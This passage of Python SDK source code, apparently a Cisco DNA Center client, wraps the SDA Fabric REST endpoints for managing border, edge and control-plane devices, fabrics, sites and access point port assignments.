return self._object_factory('bpm_d999a1d36ee52babb6b619877dad734_v2_2_2_3', json_data)
def delete_default_authentication_profile(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Delete default authentication profile in SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_b2be8b5dda8b81620b903afe9f_v2_2_2_3', json_data)
def adds_border_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Adds border device in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_b6f2d8e46cdd5f05bb06f52cd1b26fb2_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/border-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_b6f2d8e46cdd5f05bb06f52cd1b26fb2_v2_2_2_3', json_data)
def gets_border_device_detail(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Gets border device detail from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/border-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_aae881ff75d5488a5325ea949be4c5b_v2_2_2_3', json_data)
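# Illustrative usage sketch: the detail lookup keys on the device IP passed as a
# query parameter; the returned MyDict supports both access styles mentioned in
# the docstring (the `dnac` client and its `sda` namespace are assumptions):
#
#   detail = dnac.sda.gets_border_device_detail(device_ipaddress="10.10.10.1")
#   print(detail.status)             # dot notation
#   print(detail["description"])     # bracket notation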
def deletes_border_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Deletes border device from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/border-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_a102ba155e35f84b7af3396aa407d02_v2_2_2_3', json_data)
def delete_control_plane_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Delete control plane device in SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/control-plane-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_c05702ed7075a2f9ab14c051f1ac883_v2_2_2_3', json_data)
def get_control_plane_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Get control plane device from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/control-plane-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_c1a89e4a8ff15608bc6c10d7ef7389d7_v2_2_2_3', json_data)
def add_control_plane_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add control plane device in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_ae7f02a3d051f2baf7cc087990d658_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/control-plane-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_ae7f02a3d051f2baf7cc087990d658_v2_2_2_3', json_data)
def get_device_info(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Get device info from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d12790f461c553a08142ec740db5efbf_v2_2_2_3', json_data)
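# Illustrative usage sketch: fabric device info is read by device IP
# (the `dnac.sda` client wrapper is assumed as above):
#
#   info = dnac.sda.get_device_info(device_ipaddress="10.10.20.1")
#   print(info.status)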
def get_device_role_in_sda_fabric(self,
device_management_ip_address,
headers=None,
**request_parameters):
"""Get device role in SDA Fabric .
Args:
device_management_ip_address(basestring): deviceManagementIpAddress query parameter. Device Management
IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_management_ip_address, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceManagementIpAddress':
device_management_ip_address,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/device/role')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_ea24b22ce355a229b7fd067401ddf3a_v2_2_2_3', json_data)
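# Illustrative usage sketch: the role lookup uses the device management IP as a
# query parameter; the exact shape of the response body depends on the
# controller version (the `dnac` client object is an assumption):
#
#   role = dnac.sda.get_device_role_in_sda_fabric(
#       device_management_ip_address="10.10.20.1")
#   print(role.response)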
def add_edge_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add edge device in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_e0c7b28d55c85d49a84c1403ca14bd5f_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/edge-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_e0c7b28d55c85d49a84c1403ca14bd5f_v2_2_2_3', json_data)
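# Illustrative usage sketch: adding an edge device follows the same list-payload
# pattern as the border-device call above; the field names are assumptions to
# check against the SDA API documentation:
#
#   edge_payload = [{
#       "deviceManagementIpAddress": "10.10.20.1",
#       "siteNameHierarchy": "Global/San Jose/Building-1",
#   }]
#   dnac.sda.add_edge_device(payload=edge_payload)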
def delete_edge_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Delete edge device from SDA Fabric. .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/edge-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_b70d8c6f85254a053ab281fd9e8fc_v2_2_2_3', json_data)
def get_edge_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Get edge device from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/edge-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a2ee396d6595001acfbbcdfa25093ff_v2_2_2_3', json_data)
def delete_sda_fabric(self,
fabric_name,
headers=None,
**request_parameters):
"""Delete SDA Fabric .
Args:
fabric_name(basestring): fabricName query parameter. Fabric Name .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricName':
fabric_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_e14e65da844f55448c1378ca851c7d43_v2_2_2_3', json_data)
def get_sda_fabric_info(self,
fabric_name,
headers=None,
**request_parameters):
"""Get SDA Fabric Info .
Args:
fabric_name(basestring): fabricName query parameter. Fabric Name .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricName':
fabric_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b7335c6b5057b183a339aa30e7c233_v2_2_2_3', json_data)
def add_fabric(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_c31231005eaf51faa0bf1b651bdcb7a0_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_c31231005eaf51faa0bf1b651bdcb7a0_v2_2_2_3', json_data)
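# Illustrative usage sketch covering the fabric lifecycle calls above: a fabric
# is created with a list payload and later read or deleted by name. The
# "fabricName" field is an assumption from the public SDA API:
#
#   dnac.sda.add_fabric(payload=[{"fabricName": "Campus_Fabric"}])
#   info = dnac.sda.get_sda_fabric_info(fabric_name="Campus_Fabric")
#   dnac.sda.delete_sda_fabric(fabric_name="Campus_Fabric")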
def get_site(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Get Site info from SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter. Site Name Hierarchy .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric-site')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d23f3e54f8c59caac3ca905f7bf543a_v2_2_2_3', json_data)
def delete_site(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Delete Site from SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter. Site Name Hierarchy .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric-site')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_f9db3b115f0b8c8b3ce14bc5f975_v2_2_2_3', json_data)
def add_site(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add Site in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_a764c85d8df5c30b9143619d4f9cde9_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric-site')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_a764c85d8df5c30b9143619d4f9cde9_v2_2_2_3', json_data)
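# Illustrative usage sketch for the fabric-site calls above: a site is attached
# to a fabric with a list payload and can then be read back or removed by its
# site name hierarchy. Payload field names are assumptions from the public SDA
# API:
#
#   dnac.sda.add_site(payload=[{
#       "fabricName": "Campus_Fabric",
#       "siteNameHierarchy": "Global/San Jose/Building-1",
#   }])
#   site = dnac.sda.get_site(site_name_hierarchy="Global/San Jose/Building-1")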
def get_sda_fabric_count(self,
headers=None,
**request_parameters):
"""Get SDA Fabric Count .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric/count')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a74fcc0d07935a06a74662dc648ac0b7_v2_2_2_3', json_data)
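# Illustrative usage sketch: the count endpoint needs no required arguments, so
# a bare call on the assumed `dnac.sda` wrapper is enough:
#
#   count = dnac.sda.get_sda_fabric_count()
#   print(count.response)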
def add_port_assignment_for_access_point(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add Port assignment for access point in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_e4a09bf566f35babad9e27f5eb61a86d_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/access-'
+ 'point')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_e4a09bf566f35babad9e27f5eb61a86d_v2_2_2_3', json_data)
def delete_port_assignment_for_access_point(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Delete Port assignment for access point in SDA Fabric .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/access-'
+ 'point')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
